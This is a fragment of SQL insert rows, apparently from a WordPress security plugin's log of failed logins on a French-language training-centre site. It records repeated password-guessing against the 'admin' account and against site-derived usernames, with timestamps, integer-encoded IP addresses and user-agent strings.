(102199, 1498491195.594792, 1, 'loginFailValidUsername', 'admin', 1, 3075677919, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102200, 1498491729.689655, 1, 'loginFailValidUsername', 'admin', 1, 3337960456, 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET CLR 1.1.4322; .NET CLR 3.5.21022; SLCC1; Zune 4.0)'),
(102201, 1498492922.493665, 1, 'loginFailValidUsername', 'admin', 1, 3036146608, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102202, 1498492924.969355, 1, 'loginFailValidUsername', 'admin', 1, 3036146608, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102203, 1498494001.297497, 1, 'loginFailValidUsername', 'admin', 1, 3590217870, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102204, 1498494475.421998, 1, 'loginFailValidUsername', 'admin', 1, 1985718980, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102205, 1498494476.832787, 1, 'loginFailValidUsername', 'admin', 1, 1985718980, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102206, 1498494877.462148, 1, 'loginFailValidUsername', 'admin', 1, 1951063074, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102207, 1498494878.674276, 1, 'loginFailValidUsername', 'admin', 1, 1951063074, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102208, 1498495522.788278, 1, 'loginFailValidUsername', 'admin', 1, 3682725338, 'Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; fr; rv:1.9.2.8) Gecko/20100722 Firefox/3.6.8'),
(102209, 1498496800.862246, 1, 'loginFailValidUsername', 'admin', 1, 1267460864, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102210, 1498496802.282905, 1, 'loginFailValidUsername', 'admin', 1, 1267460864, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102211, 1498501763.093588, 1, 'loginFailValidUsername', 'admin', 1, 2317641320, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102212, 1498501764.530774, 1, 'loginFailValidUsername', 'admin', 1, 2317641320, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102213, 1498501983.200616, 1, 'loginFailValidUsername', 'admin', 1, 3682725338, 'Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; fr; rv:1.9.2.8) Gecko/20100722 Firefox/3.6.8'),
(102214, 1498502672.018294, 1, 'loginFailValidUsername', 'admin', 1, 644873987, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102215, 1498504310.017285, 1, 'loginFailValidUsername', 'admin', 1, 2945134175, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102216, 1498504311.440390, 1, 'loginFailValidUsername', 'admin', 1, 2945134175, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102217, 1498507812.486418, 1, 'loginFailValidUsername', 'admin', 1, 3682725338, 'Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; fr; rv:1.9.2.8) Gecko/20100722 Firefox/3.6.8'),
(102218, 1498508323.214093, 1, 'loginFailValidUsername', 'admin', 1, 84052156, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102219, 1498508324.278503, 1, 'loginFailValidUsername', 'admin', 1, 84052156, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102220, 1498508481.177724, 1, 'loginFailValidUsername', 'admin', 1, 624440655, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102221, 1498508482.313273, 1, 'loginFailValidUsername', 'admin', 1, 624440655, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102222, 1498510068.291742, 1, 'loginFailValidUsername', 'admin', 1, 1920812584, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102223, 1498510069.966092, 1, 'loginFailValidUsername', 'admin', 1, 1920812584, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102224, 1498513470.111392, 1, 'loginFailValidUsername', 'admin', 1, 3682725338, 'Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; fr; rv:1.9.2.8) Gecko/20100722 Firefox/3.6.8'),
(102225, 1498519330.511965, 1, 'loginFailValidUsername', 'admin', 1, 3682725338, 'Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; fr; rv:1.9.2.8) Gecko/20100722 Firefox/3.6.8'),
(102226, 1498520871.785007, 1, 'loginFailValidUsername', 'admin', 1, 2945444222, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102227, 1498525468.051395, 1, 'loginFailValidUsername', 'admin', 1, 3682725338, 'Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; fr; rv:1.9.2.8) Gecko/20100722 Firefox/3.6.8'),
(102228, 1498527952.012639, 1, 'loginFailValidUsername', 'admin', 1, 2249451108, 'Mozilla/5.0 (Windows NT 5.1; rv:29.0) Gecko/20100101 Firefox/29.0'),
(102229, 1498527974.146690, 1, 'loginFailValidUsername', 'admin', 1, 2074143869, 'Mozilla/5.0 (Windows NT 5.1; rv:29.0) Gecko/20100101 Firefox/29.0'),
(102230, 1498527976.648196, 1, 'loginFailValidUsername', 'admin', 1, 3708042678, 'Mozilla/5.0 (Windows NT 5.1; rv:29.0) Gecko/20100101 Firefox/29.0'),
(102231, 1498530359.663677, 1, 'loginFailValidUsername', 'admin', 1, 3169050734, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102232, 1498530361.437691, 1, 'loginFailValidUsername', 'admin', 1, 3169050734, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102233, 1498532986.152135, 1, 'loginFailValidUsername', 'admin', 1, 3682725338, 'Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; fr; rv:1.9.2.8) Gecko/20100722 Firefox/3.6.8'),
(102234, 1498534157.917634, 1, 'loginFailValidUsername', 'admin', 1, 1238903534, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102235, 1498534159.165432, 1, 'loginFailValidUsername', 'admin', 1, 1238903534, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102236, 1498538584.894726, 1, 'loginFailValidUsername', 'admin', 1, 3186141464, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102237, 1498538688.475140, 1, 'loginFailValidUsername', 'admin', 1, 1658211787, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102238, 1498538689.581145, 1, 'loginFailValidUsername', 'admin', 1, 1658211787, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102239, 1498539256.510635, 1, 'loginFailValidUsername', 'admin', 1, 1847911477, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102240, 1498539258.295880, 1, 'loginFailValidUsername', 'admin', 1, 1847911477, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102241, 1498540416.137978, 1, 'loginFailValidUsername', 'admin', 1, 3682725338, 'Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; fr; rv:1.9.2.8) Gecko/20100722 Firefox/3.6.8'),
(102242, 1498544154.250332, 1, 'loginFailValidUsername', 'admin', 1, 3171346976, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102243, 1498544155.723435, 1, 'loginFailValidUsername', 'admin', 1, 3171346976, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102244, 1498545263.734403, 1, 'loginFailValidUsername', 'admin', 1, 3169869618, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102245, 1498545267.648472, 1, 'loginFailValidUsername', 'admin', 1, 3169869618, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102246, 1498547711.468306, 1, 'loginFailValidUsername', 'admin', 1, 3682725338, 'Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; fr; rv:1.9.2.8) Gecko/20100722 Firefox/3.6.8'),
(102247, 1498551665.100191, 1, 'loginFailValidUsername', 'admin', 1, 1768737787, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102248, 1498553769.866946, 1, 'loginFailValidUsername', 'admin', 1, 1411255171, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102249, 1498553770.794968, 1, 'loginFailValidUsername', 'admin', 1, 1411255171, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102250, 1498555411.675944, 1, 'loginFailValidUsername', 'admin', 1, 3682725338, 'Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; fr; rv:1.9.2.8) Gecko/20100722 Firefox/3.6.8'),
(102251, 1498555788.959911, 1, 'loginFailValidUsername', 'admin', 1, 2851037189, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102252, 1498556017.818152, 1, 'loginFailValidUsername', 'admin', 1, 1868053842, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102253, 1498556019.303215, 1, 'loginFailValidUsername', 'admin', 1, 1868053842, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102254, 1498556752.676435, 1, 'loginFailValidUsername', 'admin', 1, 3553507500, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102255, 1498556754.200760, 1, 'loginFailValidUsername', 'admin', 1, 3553507500, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102256, 1498558064.161479, 1, 'loginFailValidUsername', 'admin', 1, 2960424783, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102257, 1498558065.165960, 1, 'loginFailValidUsername', 'admin', 1, 2960424783, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102258, 1498558174.176940, 1, 'loginFailValidUsername', 'admin', 1, 3390398482, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102259, 1498558176.210367, 1, 'loginFailValidUsername', 'admin', 1, 3390398482, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102260, 1498560090.633869, 1, 'loginFailValidUsername', 'admin', 1, 1730443484, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102261, 1498560093.313233, 1, 'loginFailValidUsername', 'admin', 1, 1730443484, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102262, 1498563350.386352, 1, 'loginFailValidUsername', 'admin', 1, 3682725338, 'Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; fr; rv:1.9.2.8) Gecko/20100722 Firefox/3.6.8'),
(102263, 1498566126.051721, 1, 'loginFailValidUsername', 'admin', 1, 3306065029, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102264, 1498568593.539866, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1539836950, 'Mozilla/5.0 (Windows NT 6.2; WOW64; x64) AppleWebKit/531.80.33 (KHTML, like Gecko) Chrome/56.3.8190.4452 Safari/534.40 OPR/44.5.0903.5275'),
(102265, 1498569964.589538, 1, 'loginFailValidUsername', 'admin', 1, 1892086715, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102266, 1498569966.222692, 1, 'loginFailValidUsername', 'admin', 1, 1892086715, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102267, 1498571239.550512, 1, 'loginFailValidUsername', 'admin', 1, 3154261957, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102268, 1498571240.548833, 1, 'loginFailValidUsername', 'admin', 1, 3154261957, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102269, 1498571321.837763, 1, 'loginFailValidUsername', 'admin', 1, 248164304, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102270, 1498571323.597796, 1, 'loginFailValidUsername', 'admin', 1, 248164304, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102271, 1498572496.502681, 1, 'loginFailValidUsername', 'admin', 1, 3682725338, 'Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; fr; rv:1.9.2.8) Gecko/20100722 Firefox/3.6.8'),
(102272, 1498572531.085227, 1, 'loginFailValidUsername', 'admin', 1, 94071740, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102273, 1498572532.717313, 1, 'loginFailValidUsername', 'admin', 1, 94071740, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102274, 1498574278.538366, 1, 'loginFailValidUsername', 'admin', 1, 2630961947, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102275, 1498574279.987814, 1, 'loginFailValidUsername', 'admin', 1, 2630961947, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102276, 1498574476.667656, 1, 'loginFailValidUsername', 'admin', 1, 1332444473, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102277, 1498574477.788314, 1, 'loginFailValidUsername', 'admin', 1, 1332444473, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102278, 1498574661.204432, 1, 'loginFailValidUsername', 'admin', 1, 1323285511, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102279, 1498574662.250134, 1, 'loginFailValidUsername', 'admin', 1, 1323285511, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102280, 1498576342.392683, 1, 'loginFailValidUsername', 'admin', 1, 3375800366, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102281, 1498576343.745527, 1, 'loginFailValidUsername', 'admin', 1, 3375800366, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102282, 1498578060.758058, 1, 'loginFailValidUsername', 'admin', 1, 1706264425, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102283, 1498578062.345580, 1, 'loginFailValidUsername', 'admin', 1, 1706264425, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102284, 1498578729.121845, 1, 'loginFailValidUsername', 'admin', 1, 3385851916, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102285, 1498578731.081679, 1, 'loginFailValidUsername', 'admin', 1, 3385851916, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102286, 1498579849.681285, 1, 'loginFailInvalidUsername', 'center', 0, 2915681446, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(102287, 1498579851.792010, 1, 'loginFailValidUsername', 'julie', 2, 2915681446, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(102288, 1498579853.919528, 1, 'loginFailValidUsername', 'pablo', 3, 2915681446, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(102289, 1498579856.078273, 1, 'loginFailInvalidUsername', 'vous', 0, 2915681446, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(102290, 1498579858.181545, 1, 'loginFailInvalidUsername', 'training', 0, 2915681446, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(102291, 1498579860.276136, 1, 'loginFailInvalidUsername', 'notre', 0, 2915681446, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(102292, 1498579862.425939, 1, 'loginFailInvalidUsername', 'pour', 0, 2915681446, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(102293, 1498579864.727935, 1, 'loginFailInvalidUsername', 'cross', 0, 2915681446, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(102294, 1498579866.862517, 1, 'loginFailInvalidUsername', 'objectifs', 0, 2915681446, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(102295, 1498579868.963063, 1, 'loginFailInvalidUsername', 'venez', 0, 2915681446, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(102296, 1498580820.933403, 1, 'loginFailValidUsername', 'admin', 1, 3682725338, 'Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; fr; rv:1.9.2.8) Gecko/20100722 Firefox/3.6.8'),
(102297, 1498581039.739187, 1, 'loginFailInvalidUsername', 'outils', 0, 788319643, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(102298, 1498581041.446345, 1, 'loginFailInvalidUsername', 'professionnel', 0, 788319643, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(102299, 1498581043.154754, 1, 'loginFailInvalidUsername', 'travail', 0, 788319643, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(102300, 1498581044.848951, 1, 'loginFailInvalidUsername', 'namur', 0, 788319643, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(102301, 1498581046.564839, 1, 'loginFailInvalidUsername', 'center', 0, 788319643, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(102302, 1498581048.232936, 1, 'loginFailValidUsername', 'julie', 2, 788319643, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(102303, 1498581049.918979, 1, 'loginFailValidUsername', 'pablo', 3, 788319643, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(102304, 1498581051.573375, 1, 'loginFailInvalidUsername', 'vous', 0, 788319643, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(102305, 1498581053.232818, 1, 'loginFailInvalidUsername', 'training', 0, 788319643, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(102306, 1498581055.079874, 1, 'loginFailInvalidUsername', 'notre', 0, 788319643, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(102307, 1498581166.916992, 1, 'loginFailValidUsername', 'admin', 1, 838128343, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102308, 1498581168.916716, 1, 'loginFailValidUsername', 'admin', 1, 838128343, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102309, 1498583779.218728, 1, 'loginFailValidUsername', 'admin', 1, 1868302956, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102310, 1498583781.153512, 1, 'loginFailValidUsername', 'admin', 1, 1868302956, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102311, 1498585000.817670, 1, 'loginFailValidUsername', 'admin', 1, 3194270743, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102312, 1498585002.297991, 1, 'loginFailValidUsername', 'admin', 1, 3194270743, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102313, 1498585833.459636, 1, 'loginFailValidUsername', 'admin', 1, 3065401114, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102314, 1498585836.462678, 1, 'loginFailValidUsername', 'admin', 1, 3065401114, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102315, 1498588215.420499, 1, 'loginFailValidUsername', 'admin', 1, 3015351469, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102316, 1498588216.858074, 1, 'loginFailValidUsername', 'admin', 1, 3015351469, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102317, 1498589505.673781, 1, 'loginFailValidUsername', 'admin', 1, 629565994, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102318, 1498589506.768945, 1, 'loginFailValidUsername', 'admin', 1, 629565994, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102319, 1498591804.616847, 1, 'loginFailValidUsername', 'admin', 1, 3680228229, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102320, 1498591807.552284, 1, 'loginFailValidUsername', 'admin', 1, 3680228229, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102321, 1498591930.068788, 1, 'loginFailValidUsername', 'admin', 1, 1731167294, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102322, 1498591931.749592, 1, 'loginFailValidUsername', 'admin', 1, 1731167294, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102323, 1498593685.986165, 1, 'loginFailValidUsername', 'admin', 1, 1329715728, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102324, 1498593687.157393, 1, 'loginFailValidUsername', 'admin', 1, 1329715728, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102325, 1498596170.307763, 1, 'loginFailValidUsername', 'admin', 1, 1048591873, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102326, 1498597669.629783, 1, 'loginFailValidUsername', 'admin', 1, 3000074456, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102327, 1498597670.620607, 1, 'loginFailValidUsername', 'admin', 1, 3000074456, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102328, 1498598411.424593, 1, 'loginFailValidUsername', 'admin', 1, 1908305645, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102329, 1498599851.253686, 1, 'loginFailValidUsername', 'admin', 1, 3188315001, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102330, 1498599853.116129, 1, 'loginFailValidUsername', 'admin', 1, 3188315001, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102331, 1498605265.737724, 1, 'loginFailValidUsername', 'admin', 1, 3206891535, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102332, 1498605267.280983, 1, 'loginFailValidUsername', 'admin', 1, 3206891535, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102333, 1498609906.093302, 1, 'loginFailValidUsername', 'admin', 1, 755475457, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102334, 1498610198.756113, 1, 'loginFailValidUsername', 'admin', 1, 3293189371, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102335, 1498610929.904968, 1, 'loginFailValidUsername', 'admin', 1, 3216151749, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102336, 1498613404.743297, 1, 'loginFailValidUsername', 'admin', 1, 3010235177, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102337, 1498613410.370514, 1, 'loginFailValidUsername', 'admin', 1, 3010235177, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102338, 1498614947.485583, 1, 'loginFailValidUsername', 'admin', 1, 1118517223, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102339, 1498614948.779139, 1, 'loginFailValidUsername', 'admin', 1, 1118517223, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102340, 1498616898.825313, 1, 'loginFailValidUsername', 'admin', 1, 1539836950, 'Mozilla/5.0 (Windows NT 5.1; WOW64; x64) AppleWebKit/532.82.35 (KHTML, like Gecko) Chrome/57.4.9471.4743 Safari/534.53 OPR/44.5.0193.6456'),
(102341, 1498620162.766831, 1, 'loginFailValidUsername', 'admin', 1, 84796080, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102342, 1498621536.252652, 1, 'loginFailValidUsername', 'admin', 1, 973497450, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102343, 1498623506.698881, 1, 'loginFailValidUsername', 'admin', 1, 3373725554, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102344, 1498623508.037379, 1, 'loginFailValidUsername', 'admin', 1, 3373725554, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102345, 1498623644.940874, 1, 'loginFailValidUsername', 'admin', 1, 1744766720, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102346, 1498623646.692281, 1, 'loginFailValidUsername', 'admin', 1, 1744766720, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
